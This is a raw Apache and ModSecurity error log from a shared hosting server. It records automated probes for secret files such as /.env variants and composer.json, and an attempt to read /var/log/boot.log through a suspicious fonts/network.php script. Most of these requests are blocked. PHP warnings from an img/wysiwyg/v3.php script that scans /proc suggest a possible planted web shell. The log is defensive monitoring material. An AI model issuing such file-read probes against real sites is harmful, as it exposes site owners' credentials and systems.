[Tue May 12 00:22:11.063873 2026] [security2:error] [pid 1590352:tid 1590393] [client 43.156.232.134:49140] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/"] [unique_id "agJWk61q0G_aXAqWauQjLAAAAIE"], referer: http://www.happy-baby-box.fr
[Tue May 12 00:22:13.405150 2026] [ssl:error] [pid 1601130:tid 1601163] (EAI 2)Name or service not known: [client 43.156.232.134:53812] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:22:13.405207 2026] [ssl:error] [pid 1601130:tid 1601163] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:13.644879 2026] [security2:error] [pid 1601130:tid 1601163] [client 43.156.232.134:53812] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.happy-baby-box.fr"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agJWlXEgAO_835W6c1m_RAAAAE0"], referer: https://www.happy-baby-box.fr/
PHP Warning:  filesize(): stat failed for /proc/73/task/73/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/73/task/73/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/73/task/73/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/73/task/73/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/73/task/73/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/73/task/73/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 00:22:58.999201 2026] [ssl:error] [pid 1601130:tid 1601170] (EAI 2)Name or service not known: [client 5.255.121.146:28210] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:58.999261 2026] [ssl:error] [pid 1601130:tid 1601170] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.182764 2026] [ssl:error] [pid 1601130:tid 1601160] (EAI 2)Name or service not known: [client 5.255.121.146:28214] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.182792 2026] [ssl:error] [pid 1601130:tid 1601160] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.185352 2026] [ssl:error] [pid 1606352:tid 1606423] (EAI 2)Name or service not known: [client 5.255.121.146:28232] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.185389 2026] [ssl:error] [pid 1606352:tid 1606423] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.185785 2026] [ssl:error] [pid 1590352:tid 1590409] (EAI 2)Name or service not known: [client 5.255.121.146:28258] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.185816 2026] [ssl:error] [pid 1590352:tid 1590409] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.186211 2026] [ssl:error] [pid 1630927:tid 1630932] (EAI 2)Name or service not known: [client 5.255.121.146:28270] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.186241 2026] [ssl:error] [pid 1630927:tid 1630932] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.186355 2026] [ssl:error] [pid 1606352:tid 1606427] (EAI 2)Name or service not known: [client 5.255.121.146:28248] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.186370 2026] [ssl:error] [pid 1606352:tid 1606427] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.187190 2026] [ssl:error] [pid 1605480:tid 1605530] (EAI 2)Name or service not known: [client 5.255.121.146:28216] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.187222 2026] [ssl:error] [pid 1605480:tid 1605530] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.187727 2026] [ssl:error] [pid 1588898:tid 1588916] (EAI 2)Name or service not known: [client 5.255.121.146:28276] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.187753 2026] [ssl:error] [pid 1588898:tid 1588916] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.201613 2026] [ssl:error] [pid 1590352:tid 1590397] (EAI 2)Name or service not known: [client 5.255.121.146:28250] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.201633 2026] [ssl:error] [pid 1590352:tid 1590397] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.201733 2026] [ssl:error] [pid 1588898:tid 1588920] (EAI 2)Name or service not known: [client 5.255.121.146:28224] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.201748 2026] [ssl:error] [pid 1588898:tid 1588920] AH01941: stapling_renew_response: responder error
[Tue May 12 00:22:59.202198 2026] [security2:error] [pid 1601130:tid 1601170] [client 5.255.121.146:28210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/.env"] [unique_id "agJWw3EgAO_835W6c1m_xAAAAFQ"]
[Tue May 12 00:22:59.202416 2026] [security2:error] [pid 1601130:tid 1601170] [client 5.255.121.146:28210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/.env"] [unique_id "agJWw3EgAO_835W6c1m_xAAAAFQ"]
[Tue May 12 00:22:59.202645 2026] [security2:error] [pid 1601130:tid 1601170] [client 5.255.121.146:28210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJWw3EgAO_835W6c1m_xAAAAFQ"]
[Tue May 12 00:22:59.234673 2026] [security2:error] [pid 1605480:tid 1605530] [client 5.255.121.146:28216] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/.env.local"] [unique_id "agJWwx2Cvzd_nyNfUm8nbAAAAQg"]
[Tue May 12 00:22:59.234859 2026] [security2:error] [pid 1605480:tid 1605530] [client 5.255.121.146:28216] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/.env.local"] [unique_id "agJWwx2Cvzd_nyNfUm8nbAAAAQg"]
[Tue May 12 00:22:59.235078 2026] [security2:error] [pid 1605480:tid 1605530] [client 5.255.121.146:28216] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJWwx2Cvzd_nyNfUm8nbAAAAQg"]
[Tue May 12 00:22:59.237148 2026] [security2:error] [pid 1606352:tid 1606427] [client 5.255.121.146:28248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/api/.env"] [unique_id "agJWw3o_DFxNSZVmaX338QAAAMg"]
[Tue May 12 00:22:59.237359 2026] [security2:error] [pid 1606352:tid 1606427] [client 5.255.121.146:28248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/api/.env"] [unique_id "agJWw3o_DFxNSZVmaX338QAAAMg"]
[Tue May 12 00:22:59.237566 2026] [security2:error] [pid 1606352:tid 1606427] [client 5.255.121.146:28248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJWw3o_DFxNSZVmaX338QAAAMg"]
[Tue May 12 00:22:59.261360 2026] [security2:error] [pid 1606352:tid 1606423] [client 5.255.121.146:28232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/app/.env"] [unique_id "agJWw3o_DFxNSZVmaX338gAAAMQ"]
[Tue May 12 00:22:59.261598 2026] [security2:error] [pid 1606352:tid 1606423] [client 5.255.121.146:28232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/app/.env"] [unique_id "agJWw3o_DFxNSZVmaX338gAAAMQ"]
[Tue May 12 00:22:59.262132 2026] [security2:error] [pid 1606352:tid 1606423] [client 5.255.121.146:28232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJWw3o_DFxNSZVmaX338gAAAMQ"]
[Tue May 12 00:22:59.506774 2026] [security2:error] [pid 1601130:tid 1601170] [client 5.255.121.146:28210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/backend/.env"] [unique_id "agJWw3EgAO_835W6c1m_xgAAAFQ"]
[Tue May 12 00:22:59.506783 2026] [security2:error] [pid 1588898:tid 1588920] [client 5.255.121.146:28224] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/.env.production"] [unique_id "agJWw6FW67LJTsgN3jQ1dwAAABY"]
[Tue May 12 00:22:59.506987 2026] [security2:error] [pid 1601130:tid 1601170] [client 5.255.121.146:28210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/backend/.env"] [unique_id "agJWw3EgAO_835W6c1m_xgAAAFQ"]
[Tue May 12 00:22:59.506988 2026] [security2:error] [pid 1588898:tid 1588920] [client 5.255.121.146:28224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/.env.production"] [unique_id "agJWw6FW67LJTsgN3jQ1dwAAABY"]
[Tue May 12 00:22:59.507215 2026] [security2:error] [pid 1601130:tid 1601170] [client 5.255.121.146:28210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJWw3EgAO_835W6c1m_xgAAAFQ"]
[Tue May 12 00:22:59.507228 2026] [security2:error] [pid 1588898:tid 1588920] [client 5.255.121.146:28224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agJWw6FW67LJTsgN3jQ1dwAAABY"]
[Tue May 12 00:22:59.539458 2026] [ssl:error] [pid 1601130:tid 1601156] (EAI 2)Name or service not known: [client 5.255.121.146:28290] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 00:22:59.539481 2026] [ssl:error] [pid 1601130:tid 1601156] AH01941: stapling_renew_response: responder error
[Tue May 12 00:24:07.213629 2026] [ssl:error] [pid 1588898:tid 1588904] (EAI 2)Name or service not known: [client 51.68.236.71:27931] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Tue May 12 00:24:07.214234 2026] [ssl:error] [pid 1588898:tid 1588904] AH01941: stapling_renew_response: responder error
[Tue May 12 00:24:11.264396 2026] [security2:error] [pid 1601130:tid 1601159] [client 43.134.92.251:36568] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-content/uploads/2018/08/les-youngtimers-1980a2000-le"] [unique_id "agJXC3EgAO_835W6c1m_9gAAAEk"]
[Tue May 12 00:24:42.384868 2026] [security2:error] [pid 1630927:tid 1630935] [client 129.226.151.24:42042] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/downloads/CR-AG-2-10-21.pdf"] [unique_id "agJXKmiGYYhUwDaJINm3GQAAAUU"]
[Tue May 12 00:24:48.492674 2026] [:error] [pid 1601130:tid 1601158] [client 81.167.26.57:35292] File does not exist: /home/piregwan/public_html/liens/true.php
[Tue May 12 00:24:51.878416 2026] [security2:error] [pid 1601130:tid 1601160] [client 216.73.216.110:24295] ModSecurity: Warning. Matched phrase "var/log/boot.log" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/boot.log found within ARGS:filesrc: /var/log/boot.log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJXM3EgAO_835W6c1nASAAAAEo"]
[Tue May 12 00:24:51.879060 2026] [security2:error] [pid 1601130:tid 1601160] [client 216.73.216.110:24295] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJXM3EgAO_835W6c1nASAAAAEo"]
[Tue May 12 00:24:51.973819 2026] [security2:error] [pid 1601130:tid 1601160] [client 216.73.216.110:24295] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJXM3EgAO_835W6c1nASAAAAEo"]
[Tue May 12 00:24:54.140070 2026] [security2:error] [pid 1605480:tid 1605527] [client 147.135.214.166:50128] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /includes/parsedown/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "facturation.rentparadise.fr"] [uri "/includes/parsedown/composer.json"] [unique_id "agJXNh2Cvzd_nyNfUm8n8QAAAQU"]
[Tue May 12 00:24:54.140386 2026] [security2:error] [pid 1605480:tid 1605527] [client 147.135.214.166:50128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "facturation.rentparadise.fr"] [uri "/includes/parsedown/composer.json"] [unique_id "agJXNh2Cvzd_nyNfUm8n8QAAAQU"]
[Tue May 12 00:24:54.140764 2026] [security2:error] [pid 1605480:tid 1605527] [client 147.135.214.166:50128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "facturation.rentparadise.fr"] [uri "/includes/parsedown/composer.json"] [unique_id "agJXNh2Cvzd_nyNfUm8n8QAAAQU"]
[Tue May 12 00:24:55.633885 2026] [security2:error] [pid 1590352:tid 1590409] [client 147.135.214.166:33126] ModSecurity: Warning. Matched phrase "/composer.json" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /composer.json found within REQUEST_FILENAME: /includes/parsedown/composer.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "facturation.rentparadise.fr"] [uri "/includes/parsedown/composer.json"] [unique_id "agJXN61q0G_aXAqWauQj2QAAAJE"]
[Tue May 12 00:24:55.634131 2026] [security2:error] [pid 1590352:tid 1590409] [client 147.135.214.166:33126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "facturation.rentparadise.fr"] [uri "/includes/parsedown/composer.json"] [unique_id "agJXN61q0G_aXAqWauQj2QAAAJE"]
[Tue May 12 00:24:55.634640 2026] [security2:error] [pid 1590352:tid 1590409] [client 147.135.214.166:33126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "facturation.rentparadise.fr"] [uri "/includes/parsedown/composer.json"] [unique_id "agJXN61q0G_aXAqWauQj2QAAAJE"]
